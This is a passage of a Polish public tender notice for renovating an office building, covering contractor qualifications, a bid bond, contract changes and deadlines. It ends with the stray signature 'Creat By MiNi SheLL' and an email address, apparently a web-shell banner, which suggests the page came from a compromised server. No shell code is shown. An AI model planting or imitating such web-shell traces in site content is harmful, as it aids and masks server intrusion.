przepisów.<br/>b. Kierownik robót sanitarnych – osoba posiadająca przez okres nie krótszy niż 3 lata, uprawnienia budowlane bez ograniczeń, zgodnie z wymaganiami ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. 1994 nr 89 poz. 414 z późn. zm.), do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub posiadająca odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów <br/>c. Kierownik robót elektroenergetycznych – osoba posiadająca przez okres nie krótszy niż 3 lata, uprawnienia budowlane bez ograniczeń, zgodnie z wymaganiami ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U.1994 nr 89 poz. 414 z późn. zm.), do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: elektrycznych i elektroenergetycznych lub posiadająca odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów <br/>Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, tj. m.in. w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz.65) lub zgodnie z wcześniej obowiązującymi przepisami dotyczące uznawania ww. kwalifikacji lub posiadać prawo do świadczenia usług transgranicznych zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz.U. 2016 poz. 1725 z późn. zm.).<br/>UWAGA! Dopuszcza się, aby powyższe funkcje były łączone, tzn. pełnione przez jedną osobę, w ramach posiadanych przez nią uprawnień.<br/>Zamawiający wymaga od wykonawców wskazania w wykazie osób informacji na temat kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego w/w osób, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami.<br/>W odniesieniu do warunku dotyczącego wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają robotę budowalną lub usługi, do realizacji których te zdolności są wymagane.<br/>Zamawiający dopuszcza sumowanie potencjału wykonawców wspólnie ubiegających się o zamówienie lub wykonawców i podmiotów udostępniających zasoby w zakresie osób skierowanych do realizacji zamówienia. Powyższe oznacza, że osoby te mogą być zaangażowane przez jednego wykonawcę, jeden podmiot udostępniający zasoby lub przez kilku wykonawców lub podmioty udostępniające zasoby.<br/>Wykazanie spełnienia warunków udziału w postępowaniu przez Wykonawcę poprzez korzystanie z zasobów innych podmiotów zostały opisane w pkt. IX SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postepowania wskazanych przez<br/>Zamawiającego, o których mowa w art. 108 ust. 1 pkt. 3 – 6 oraz art. 109 ust. 1 pkt. 5 i 7 ustawy<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/>3) Informacja z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych<br/>w art. 108 ust. 1 pkt 1, 2 i 4 ustawy PZP sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czy dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot , na rzecz którego roboty te zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- inne odpowiednie dokumenty.<br/>2)	Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> formularz oferty, pełnomocnictwo (jeżeli dotyczy), oświadczenie o spełnianiu warunków oraz<br/>niepodleganiu wykluczeniu, o którym mowa w art. 273 ust. 1 ustawy PZP, zobowiązanie innego<br/>podmiotu wraz z oświadczeniem tego podmiotu o braku podstaw wykluczenia tego podmiotu<br/>oraz odpowiednio o spełnianiu warunków udziału w postępowaniu, dowód wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca składający ofertę zobowiązany jest wnieść wadium w wysokości 20 000,00 zł (słownie: dwadzieścia tysięcy złotych) przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu zawiązania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt. 2 i 3 oraz ust. 2. <br/>W przypadku składnia Oferty w postaci elektronicznej oryginał dokumentu wadium (poręczenia lub gwarancji) opatrzonego kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia, Wykonawca składa załączając na Platformie w zakładce „OFERTY” – poprzez wybranie polecenia „dodaj dokument&#34;.<br/>2.	Wadium może być wnoszone:<br/>2.1.	w pieniądzu – przelewem – na rachunek nr PL74 1020 2892 0000 5102 0405 1249 Bank PKO BP SA z dopiskiem „wadium – remont biurowca Kordylewskiego 11” przed upływem terminu składania ofert tak, aby przed upływem tego terminu wadium znajdowało się na ww. rachunku (za termin wniesienia wadium przyjmuje się datę i godzinę uznania rachunku Zamawiającego), natomiast kopię dowodu wpłaty należy dołączyć do oferty. Kserokopię poświadcza Wykonawca za zgodność z oryginałem,<br/>2.2.	w gwarancjach bankowych, <br/>2.3.	w gwarancjach ubezpieczeniowych, <br/>2.4.	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 ze zm.).<br/>3.	W przypadku wniesienia wadium w formie innej niż pieniężna powyższy dokument należy złożyć w oryginale w postaci elektronicznej. Wniesienie dokumentu wadium w postaci elektronicznej powinno obejmować przekazanie tego dokumentu w takiej formie w jakiej został on ustanowiony przez gwaranta, tj. oryginału dokumentu.<br/>4.	Dopuszczalne jest złożenie wadium w więcej niż jednej formie.<br/>5.	Wadium złożone w formie poręczenia lub gwarancji musi być wystawione na Małopolską Agencję Rozwoju Regionalnego SA, 31-542 Kraków, ul. Kordylewskiego 11.<br/>W przypadku wniesienia wadium w formie poręczenia lub gwarancji Zamawiający wymaga, aby w treści takiego dokumentu znalazło się oświadczenie Gwaranta (Poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek wymienionych w art. 98 ust. 6 ustawy. Jednocześnie Zamawiający wymaga, aby okres ważności gwarancji (poręczenia) nie był krótszy niż okres związania ofertą (z zastrzeżeniem że pierwszym dniem związania ofertą jest dzień składania ofert). W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującymi przepisami, powinna być bezwarunkowa, nieodwołalna i winna zawiera następujące elementy:<br/>5.1 nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, <br/>5.2 określenie wierzytelności, którą ma być zabezpieczona gwarancja,<br/>5.3 kwotę gwarancji, <br/>5.4 termin ważności gwarancji, <br/>5.5 zobowiązanie gwaranta do zapłacenia gwarancji na pierwsze pisemne żądanie Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VIII SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w Rozdziale VIII pkt.4. 4) SWZ dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>5.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>6.	W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego Wykonawcy ci - przed zawarciem umowy z Zamawiającym - są zobowiązani do przedłożenia zamawiającemu umowy regulującej ich współpracę w zakresie przedmiotowego zamówienia.<br/>7.	W przypadku oferty wspólnej w formularzu oferty w miejscu „Nazwa i adres Wykonawcy” należy wskazać wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8.	Możliwość powierzenia przez Wykonawców wspólnie ubiegających się o zamówienie wykonania części zamówienia przez podwykonawcę (art. 462 i n.):<br/>a)	Wykonawca jest zobowiązany wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom z podaniem przez wykonawcę firm podwykonawców,<br/>b)	Zamawiający informuje, ze nie zastrzega osobistego wykonania przez wykonawcę kluczowych części zamówienia,<br/>c)	Jeżeli zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, wykonawca obowiązany jest zastąpić tego podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia podwykonawcy,<br/>d)	Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień Umowy jest dopuszczalna jeżeli zachodzi jedna z okoliczności wymienionych w art. 455 PZP. Zamawiający, w granicach dozwolonych przepisami art. 455 ust. 1 pkt 1 PZP, dopuszcza możliwość zmiany umowy w szczególności w przypadku: <br/>a)	zmiany w zakresie przedmiotu zamówienia i wynagrodzenia przysługującego Wykonawcy, na uzasadniony wniosek Wykonawcy lub Zamawiającego, jeżeli zmiana wynika z okoliczności, której Wykonawca nie mógł przewidzieć na etapie składania ofert i nie jest przez niego zawiniona,<br/>b)	zmiany w zakresie przedmiotu zamówienia, polegające na wprowadzeniu, na wniosek Inspektora Nadzoru rozwiązań zamiennych w stosunku do rozwiązań określonych w dokumentacji projektowej, o ile nie spowoduje to rozszerzenia przedmiotu umowy. Możliwość wprowadzenia rozwiązania zamiennego wymaga uzgodnienia z projektantem w ramach prowadzonego nadzoru autorskiego,<br/>c)	przedłużenia terminu wykonania zamówienia o czas niezbędny na jego wykonanie, w przypadku wystąpienia siły wyższej, tj. wyjątkowego zdarzenia, okoliczności lub warunków atmosferycznych, które uniemożliwiają wykonywanie prac w ustalonym terminie,<br/>d)	przedłużenia terminu wykonania zamówienia o czas niezbędny na jego wykonanie, w przypadku wystąpienia innego niż siła wyższa zdarzenia nieprzewidywalnego i losowego, pozostającego poza kontrolą Stron i za które żadna ze Stron nie ponosi odpowiedzialności,<br/>e)	zmiany terminu wykonania zamówienia będącej następstwem okoliczności leżących po stronie Zamawiającego, takich jak: niedające się przewidzieć utrudnienia, czasowe wstrzymanie wykonywania prac, o którym mowa w § 1 ust. 8 Umowy i § 9 ust. 12 lub inne przeszkody dające się przypisać Zamawiającemu,<br/>f)	zmiany w zakresie udziału w realizacji zamówienia podwykonawców. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 PZP w celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia te warunku w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. Zmiana ta nie może prowadzić do zwiększenia wynagrodzenia Wykonawcy,<br/>g)	zmiany terminu wykonania zamówienia z powodu zmiany istotnych przepisów prawa, powodującej konieczność dostosowania przedmiotu zamówienia do zmiany przepisów;<br/>h)	zmiany osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wskazanych w Załączniku nr 8 do Umowy, pod warunkiem, że nowa osoba będzie posiadać kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie spełniające warunki określone w SWZ,<br/>i)	zmiany harmonogramu prac, który stanowi Załącznik nr 13 do Umowy, na uzasadniony wniosek Wykonawcy lub Zamawiającego, jeżeli zmiana nie wpłynie na terminy wykonania zamówienia, <br/>j)	zmiany pracowników świadczących czynności wskazane w § 10 ust. 1, wymienionych w Załączniku nr 14 do Umowy, pod warunkiem, że osoby te spełniają wymagania określone dla danego stanowiska pracy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-02 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://marr.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-02 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przekazanie terenu budowy i rozpoczęcie prac budowlanych w budynku nastąpi nie wcześniej niż 15.09.2022 r. Wykonawca zobowiązuje się wykonać zamówienie w terminie nie dłuższym niż 217 dni kalendarzowych licząc od dnia przekazania terenu budowy, w tym etap I należy wykonać w terminie do 100 dni kalendarzowych. Dla zachowania powyższych terminów, najpóźniej w tychże dniach winien nastąpić protokolarny odbiór prac przez Zamawiającego<br/>------------------------------------------------------------------------------------------<br/>1.Zamawiający wymaga zatrudnienia przez Wykonawcę, podwykonawcę lub dalszego podwykonawcę na podstawie stosunku pracy, w rozumieniu ustawy z dnia 26.06.1974 roku Kodeks pracy (Dz.U. z 2020, poz. 1320 ze zm.), osób wykonujących następujące czynności w zakresie realizacji zamówienia:<br/>1)	wykonanie posadzek z płytek,<br/>2) malowanie ścian <br/>1.1 W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w pkt. 10 czynności. Zamawiający uprawniony jest w szczególności do:<br/>a)	żądania dokumentów w zakresie potwierdzenia spełniania ww. wymogów i dokonywania ich oceny np. uwierzytelnionych kopii umów o pracę zanonimizowanych (pozbawionych danych osobowych pracowników, za wyjątkiem imienia i nazwiska, daty zawarcia umowy o pracę, rodzaj umowy o pracę, wymiar etatu), oświadczenia wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności zawierające elementy stosunku pracy lub zaświadczenia właściwego oddziału ZUS-u potwierdzające opłacanie składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę, <br/>b)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,<br/>c)	przeprowadzania kontroli w miejscu wykonywania świadczenia.<br/>Z tytułu niespełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w pkt. 9 czynności Zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary umownej w wysokości określonej w istotnych postanowieniach umowy w sprawie zamówienia publicznego. Niezłożenie przez wykonawcę w wyznaczonym przez Zamawiającego terminie żądanych przez Zamawiającego oświadczeń potwierdzających spełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w pkt. 10 czynności.<br/>	1.3 W przypadku uzasadnionych wątpliwości co do przestrzegania przez wykonawcę lub podwykonawcę przepisów prawa pracy Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy

Creat By MiNi SheLL
Email: jattceo@gmail.com